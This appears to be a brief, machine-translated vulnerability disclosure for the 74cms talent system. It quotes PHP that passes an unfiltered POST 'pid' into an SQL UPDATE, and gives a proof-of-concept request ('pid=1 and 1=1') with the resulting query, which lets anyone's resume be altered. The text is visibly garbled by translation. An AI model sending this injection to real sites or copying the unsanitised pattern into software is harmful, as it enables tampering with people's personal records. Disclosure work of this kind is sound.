Server guard talent system SQL injection + unauthorized modification of resumes of anyone
Server guard talent system SQL injection + unauthorized modification of resumes of anyone
Wap_user.php:
$ Setsqlarr ['trade _ cn'] = trim ($ _ POST ['trade _ cn'])? Trim ($ _ POST ['trade _ cn']): exit ("select the expected industry "); $ setsqlarr ['District _ cn'] = trim ($ _ POST ['District _ cn'])? Trim ($ _ POST ['District _ cn']): exit ("select the expected region "); $ setsqlarr ['District '] = trim ($ _ POST ['District']); $ setsqlarr ['sdidstrict '] = trim ($ _ POST ['sdidstrict']); if (! Updatetable (table ('resume'), $ setsqlarr, "id = $ _ POST [pid]") exit ("err ");
The updatetable (table ('resume'), $ setsqlarr, "id = $ _ POST [pid]"
Here id = $ _ POST [pid] is not processed, so simple and 1 = 1 can be injected.
The primary key id of the Resume Information in the qs_resume table is not controlled by id. That is to say, the $ _ POST [pid] We submitted can modify any record.
Access url:
POST/74cms_v3.5.20.20151115/upload/wap/personal/wap_user.php? Act = resume_jobs_save HTTP/1.1
Host: localhost
Postdata: Submit pid = 1 and 1 = 1
Capture the SQL statement;
UPDATE qs_resume SET 'intention _ jobs' = '\ xCF \ xFA \ xCA \ xDB \ xD0 \ xD0 \ xD5 \ xFE \ xC9 \ xCC \ xCE \ xF1/\ xCF \ xFA \ xCA \ xDB \ xD0 \ xD0 \ xD5 \ xFE \ xC8 \ xCB? ', 'Wage' = '59', 'wage _ cn' = '2017 ~ 5000? /\ XD4 \ xC2 ', 'Nature' = '63', 'Nature _ cn' = '\ xBC \ xE6? ', 'Trade' = '5', 'trade _ cn' = '\ xCD \ xF8 \ xC2 \ xE7 \ xD3 \ xCE? ', 'District _ cn' =' \ xBA? \ XB1? /\ XBA \ xAA \ xB5 \ xA6 \ xCA \ xD0 ', 'District' = '5', 'sdidstrict '= '000000' WHERE id = 1 and 1 = 1
We can modify any information.
Solution:
Enhanced Filtering